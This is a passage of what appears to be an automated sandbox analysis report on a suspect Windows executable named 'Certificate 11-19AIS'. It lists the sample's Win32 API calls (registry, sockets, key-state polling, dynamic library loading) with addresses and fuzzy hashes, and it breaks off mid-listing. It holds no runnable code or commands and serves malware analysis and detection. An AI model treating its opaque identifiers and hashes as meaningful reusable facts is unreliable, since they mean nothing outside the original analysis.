                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 4146253029-1011021900
                                                                              • Opcode ID: 2913dc2cb3743684243c11c33b11e83a66721f0ecc2c4e796c9f8ec5cd515293
                                                                              • Instruction ID: b865661bc7ffad84f4765fa173b3fd4578b198b99bc2b770bfe468b415919c64
                                                                              • Opcode Fuzzy Hash: 2913dc2cb3743684243c11c33b11e83a66721f0ecc2c4e796c9f8ec5cd515293
                                                                              • Instruction Fuzzy Hash: 1C219D7120020ABBEF204E64DCA9EFA37ADFF99364F110628FA94D2190D735DCD1A760
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 007F9588
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F95B9
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 007F95CB
                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007F9605
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: bdca7f73db0bc3d609ce9a991ad4645868ecf643473115bfb48b1428751bfa5e
                                                                              • Instruction ID: 20390256b064f649baf6e7923f1f8a94440491238462aa67857bb65d13d81a3e
                                                                              • Opcode Fuzzy Hash: bdca7f73db0bc3d609ce9a991ad4645868ecf643473115bfb48b1428751bfa5e
                                                                              • Instruction Fuzzy Hash: 4F218E70600309ABDB219F25DC05BAABBB8BF94720F204A19FBA1D73D0D774E950CB20
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 007F9653
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F9683
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 007F9694
                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007F96CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: b08b539089f00023202107f17fa96b1f6054ccdd0be706b05f0565888904f7c9
                                                                              • Instruction ID: d02324a015ff6c7ef020ed78b9db199c01da0245dc791047c7e9286832369f33
                                                                              • Opcode Fuzzy Hash: b08b539089f00023202107f17fa96b1f6054ccdd0be706b05f0565888904f7c9
                                                                              • Instruction Fuzzy Hash: 1C216D71600309DBDB209F699C44FAAB7B8BF95724F200A19FBA1E73D0E7749841CB50
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 007FDB0A
                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007FDB5E
                                                                              • __swprintf.LIBCMT ref: 007FDB77
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0084DC00), ref: 007FDBB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu
                                                                              • API String ID: 3164766367-685833217
                                                                              • Opcode ID: ff47bedd76c9e91d97ed8dd241b835521dc910be7f1a5af2ebd364a266c4dc44
                                                                              • Instruction ID: dad49e41466d9ac68ec16f987b640099bbeecc663a94adcaf1f805ad3fb0572c
                                                                              • Opcode Fuzzy Hash: ff47bedd76c9e91d97ed8dd241b835521dc910be7f1a5af2ebd364a266c4dc44
                                                                              • Instruction Fuzzy Hash: 16217175600208EFCB11EFA4D989EEEB7B8EF88704B004069F605D7351DB74EA01DB61
                                                                              APIs
                                                                                • Part of subcall function 007EC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007EC84A
                                                                                • Part of subcall function 007EC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007EC85D
                                                                                • Part of subcall function 007EC82D: GetCurrentThreadId.KERNEL32 ref: 007EC864
                                                                                • Part of subcall function 007EC82D: AttachThreadInput.USER32(00000000), ref: 007EC86B
                                                                              • GetFocus.USER32 ref: 007ECA05
                                                                                • Part of subcall function 007EC876: GetParent.USER32(?), ref: 007EC884
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 007ECA4E
                                                                              • EnumChildWindows.USER32(?,007ECAC4), ref: 007ECA76
                                                                              • __swprintf.LIBCMT ref: 007ECA90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                              • String ID: %s%d
                                                                              • API String ID: 3187004680-1110647743
                                                                              • Opcode ID: a8ba2e8e1de41788574492cf80776d50dd51f879fed04f6246230f09f69cef5b
                                                                              • Instruction ID: 0988582445e3895bd21366fc96d53d291948c80454c0f835783cd3787c072966
                                                                              • Opcode Fuzzy Hash: a8ba2e8e1de41788574492cf80776d50dd51f879fed04f6246230f09f69cef5b
                                                                              • Instruction Fuzzy Hash: 33118775500205BBCF12BF619C8AFE9377DAF48714F008076FE18AA142DB789546DB70
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008119F3
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00811A26
                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00811B49
                                                                              • CloseHandle.KERNEL32(?), ref: 00811BBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                              • String ID:
                                                                              • API String ID: 2364364464-0
                                                                              • Opcode ID: 657ca58740f655de34a8b91987d534cf3f8db6f651174900718844d451b6246a
                                                                              • Instruction ID: 7334b9223880aa48a7b81f62b130f5909f7bc2dee2b8f7490d8f0a88fa300ffe
                                                                              • Opcode Fuzzy Hash: 657ca58740f655de34a8b91987d534cf3f8db6f651174900718844d451b6246a
                                                                              • Instruction Fuzzy Hash: D0813270600214EBDF119F64C88AFADBBE9FF44720F14845DFA15AF382D7B9A9418B90
APIs
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0081E1D5
• SendMessageW.USER32(?,000000B0,?,?), ref: 0081E20D
• IsDlgButtonChecked.USER32(?,00000001), ref: 0081E248
• GetWindowLongW.USER32(?,000000EC), ref: 0081E269
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0081E281
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: MessageSend$ButtonCheckedLongWindow
• String ID:
• API String ID: 3188977179-0
• Opcode ID: 568e1bf9a12fdb719c889d27e573993ed8050f1de874d092f2e5fc3036fee38b
• Instruction ID: 03cee31f65778f113116dd5f2b5313765cb56bf32c0f9cdeaa48473e7d1b4890
• Opcode Fuzzy Hash: 568e1bf9a12fdb719c889d27e573993ed8050f1de874d092f2e5fc3036fee38b
• Instruction Fuzzy Hash: 24619A34A00608AFDB258F58C899FEA77BEFF99301F148099FD59D72A1C770A990CB10
APIs
• VariantInit.OLEAUT32(?), ref: 007F1CB4
• VariantClear.OLEAUT32(00000013), ref: 007F1D26
• VariantClear.OLEAUT32(00000000), ref: 007F1D81
• VariantClear.OLEAUT32(?), ref: 007F1DF8
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007F1E26
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: f9ba12ce38d48e7b723dff51194fa8fad7787e955cde03c3d96e5149242b14a5
• Instruction ID: 32f33969498130d720b13e999e1f0dec958533404f137fd6afe0eaab9ac7ea99
• Opcode Fuzzy Hash: f9ba12ce38d48e7b723dff51194fa8fad7787e955cde03c3d96e5149242b14a5
• Instruction Fuzzy Hash: 1E514AB5A00209EFDB14CF58D880AAAB7B8FF8C314F158559EA59DB305D334E951CFA0
APIs
  • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
  • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 008106EE
• GetProcAddress.KERNEL32(00000000,?), ref: 0081077D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0081079B
• GetProcAddress.KERNEL32(00000000,?), ref: 008107E1
• FreeLibrary.KERNEL32(00000000,00000004), ref: 008107FB
  • Part of subcall function 007CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007FA574,?,?,00000000,00000008), ref: 007CE675
  • Part of subcall function 007CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007FA574,?,?,00000000,00000008), ref: 007CE699
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: 5d419ab23d9437594b0e77f5d8b36a3ccdd4c127384401f24dd5fe8ca3cb3a5b
• Instruction ID: ce5af871141e1a13ecad7214882b332671e6cec1f1328297eb844968de180de4
• Opcode Fuzzy Hash: 5d419ab23d9437594b0e77f5d8b36a3ccdd4c127384401f24dd5fe8ca3cb3a5b
• Instruction Fuzzy Hash: 60512775A00209DFCB10EFA8C889AEDB7B9FF48310B148459EA15EB351DB75AD85CF90
APIs
  • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00812EEF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00812F2E
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00812F75
• RegCloseKey.ADVAPI32(?,?), ref: 00812FA1
• RegCloseKey.ADVAPI32(00000000), ref: 00812FAE
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 3740051246-0
• Opcode ID: 2266d29e2c596d7c3028111cb4322bd35356940d23aa665e96ce1f550363efa5
• Instruction ID: 73a65a24aa892a1be11b40f7a82e20011031d347f523bbfbd9df8556efae6c5f
• Opcode Fuzzy Hash: 2266d29e2c596d7c3028111cb4322bd35356940d23aa665e96ce1f550363efa5
• Instruction Fuzzy Hash: DB514672208208EFD715EB64C895FAAB7F9FF88704F00881DF595872A1EB34E955CB52
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a279d1425d3a46792a1dcc6c1644239ff8516c8ccd89ab54c90c79f992291767
• Instruction ID: ec6c3923b9554fe7798edcd7e3551f473fc8d31bada492013abad76daeb906b2
• Opcode Fuzzy Hash: a279d1425d3a46792a1dcc6c1644239ff8516c8ccd89ab54c90c79f992291767
• Instruction Fuzzy Hash: 7441A179940248AFCB20DB68DC48FE9BB6CFF49310F140265E959E72E1C730AD91DA90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008012B4
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008012DD
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0080131C
  • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
  • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00801341
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00801349
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: e6290d5a4c3dc35c2970279487a1e6ea37e3c626838eaf1d5837a675d66d517a
• Instruction ID: 0af7c9fb86586e37381867a3f0dfb3288cd9a4795ed3be1b2651ea76dfa6fbce
• Opcode Fuzzy Hash: e6290d5a4c3dc35c2970279487a1e6ea37e3c626838eaf1d5837a675d66d517a
• Instruction Fuzzy Hash: 00412D35A00205DFCF01EF64C995AAEBBF5FF48314B158099E90AAB3A2CB35ED01DB50
APIs
• GetCursorPos.USER32(000000FF), ref: 007CB64F
• ScreenToClient.USER32(00000000,000000FF), ref: 007CB66C
• GetAsyncKeyState.USER32(00000001), ref: 007CB691
• GetAsyncKeyState.USER32(00000002), ref: 007CB69F
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: db48882328e29a765d99ff98b1d2bea14cba6762dbe6f086dc932a75f708fd9f
• Instruction ID: 76de36469cf1b4943783a05a3e7059262447f54534175e522e8b899a06012678
• Opcode Fuzzy Hash: db48882328e29a765d99ff98b1d2bea14cba6762dbe6f086dc932a75f708fd9f
• Instruction Fuzzy Hash: 9B416A75604219FBCF159F68C845EE9BBB4FF05324F20431AF829A6290CB34A994DFA1
APIs
• GetWindowRect.USER32(?,?), ref: 007EB369
• PostMessageW.USER32(?,00000201,00000001), ref: 007EB413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007EB41B
• PostMessageW.USER32(?,00000202,00000000), ref: 007EB429
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007EB431
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: f0a1bd7e556e0c83218903b18b36a9020e547c04d0ed15d2dc9d3b4a5f05ef6e
• Instruction ID: 66cfd42fa4e79c8516fc03d74e5270001c67439dc4a91e0f45b56a0c83bebc5d
• Opcode Fuzzy Hash: f0a1bd7e556e0c83218903b18b36a9020e547c04d0ed15d2dc9d3b4a5f05ef6e
• Instruction Fuzzy Hash: C931DCB1901259EBDF00CFA9D94EA9E7FB5FB48319F104229F820AA1D1C3B49910CB90
APIs
• IsWindowVisible.USER32(?), ref: 007EDBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007EDBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007EDC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007EDC52
• _wcsstr.LIBCMT ref: 007EDC5C
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: 43ff41ee718eff77d9eb479e4b4e42a78c6c6205d529e614f74fa49d66157298
• Instruction ID: 5d91142a358a68640bd1b53ad22eaf82a281609d203e8c2bbec34d02f46fc760
• Opcode Fuzzy Hash: 43ff41ee718eff77d9eb479e4b4e42a78c6c6205d529e614f74fa49d66157298
• Instruction Fuzzy Hash: 64212C71205244BFEB255F36EC49E7B7BA9EF49750F20403DF909CA151EAA9DC01D2B0
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007EBC90
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007EBCC2
                                                                              • __itow.LIBCMT ref: 007EBCDA
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007EBD00
                                                                              • __itow.LIBCMT ref: 007EBD11
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: 0399cdf1603926f402443d09f5201dd58c9b75a08693341094dd0d691e1d0b62
                                                                              • Instruction ID: 8dc93616f99b5966eb13bfd900b19f98dd4e6a373e74fa02cfc01b9af2ab2d21
                                                                              • Opcode Fuzzy Hash: 0399cdf1603926f402443d09f5201dd58c9b75a08693341094dd0d691e1d0b62
                                                                              • Instruction Fuzzy Hash: 8C21D47170160CBADB10AE669C8AFDF7E68AF9D310F100465FA05EB181EB788D0583A1
                                                                              APIs
                                                                                • Part of subcall function 007B50E6: _wcsncpy.LIBCMT ref: 007B50FA
                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,007F60C3), ref: 007F6369
                                                                              • GetLastError.KERNEL32(?,?,?,007F60C3), ref: 007F6374
                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007F60C3), ref: 007F6388
                                                                              • _wcsrchr.LIBCMT ref: 007F63AA
                                                                                • Part of subcall function 007F6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007F60C3), ref: 007F63E0
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                              • String ID:
                                                                              • API String ID: 3633006590-0
                                                                              • Opcode ID: 5f39466d97bb15225c8c6f26d581e9cc735537d32d0daa2aa42789aa94c1208b
                                                                              • Instruction ID: 11399b72ff16d38e64a2c50192da8ecee3b915aaca81d27af8884f2d1c94aae5
                                                                              • Opcode Fuzzy Hash: 5f39466d97bb15225c8c6f26d581e9cc735537d32d0daa2aa42789aa94c1208b
                                                                              • Instruction Fuzzy Hash: BE21273190421DDBDF15AB78AC46FFA33ACEF15360F10046AF215D32C0EB68D9858A65
                                                                              APIs
                                                                                • Part of subcall function 0080A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0080A84E
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00808BD3
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808BE2
                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00808BFE
                                                                              Similarity
                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 3701255441-0
                                                                              • Opcode ID: 0219afc217565f4b891440029e485dd19dc95c5a1dde0543fb07e58dda1f2b1e
                                                                              • Instruction ID: 48c2ce324a6f9a690ab8b0861deb1816f3278ec501784316b11c9f860cd41944
                                                                              • Opcode Fuzzy Hash: 0219afc217565f4b891440029e485dd19dc95c5a1dde0543fb07e58dda1f2b1e
                                                                              • Instruction Fuzzy Hash: 11216D312002189FDB50AB68DD89F7E77A9FF88720F044859F956EB2D2CE74A8418B61
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 00808441
                                                                              • GetForegroundWindow.USER32 ref: 00808458
                                                                              • GetDC.USER32(00000000), ref: 00808494
                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 008084A0
                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 008084DB
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              • Opcode ID: 0ec8c690acddd89e65e47227163328ebb0e278e1a8446f997e8504a60c10ac13
                                                                              • Instruction ID: 2ad4ad6e128d28d077faa5768929279baafed1b351e9446e9a8243d3c5cc3a9b
                                                                              • Opcode Fuzzy Hash: 0ec8c690acddd89e65e47227163328ebb0e278e1a8446f997e8504a60c10ac13
                                                                              • Instruction Fuzzy Hash: 85216275A00204EFD710DFA4DD49AAEB7E5FF88301F148879E959D7252DB74AD40CBA0
                                                                              APIs
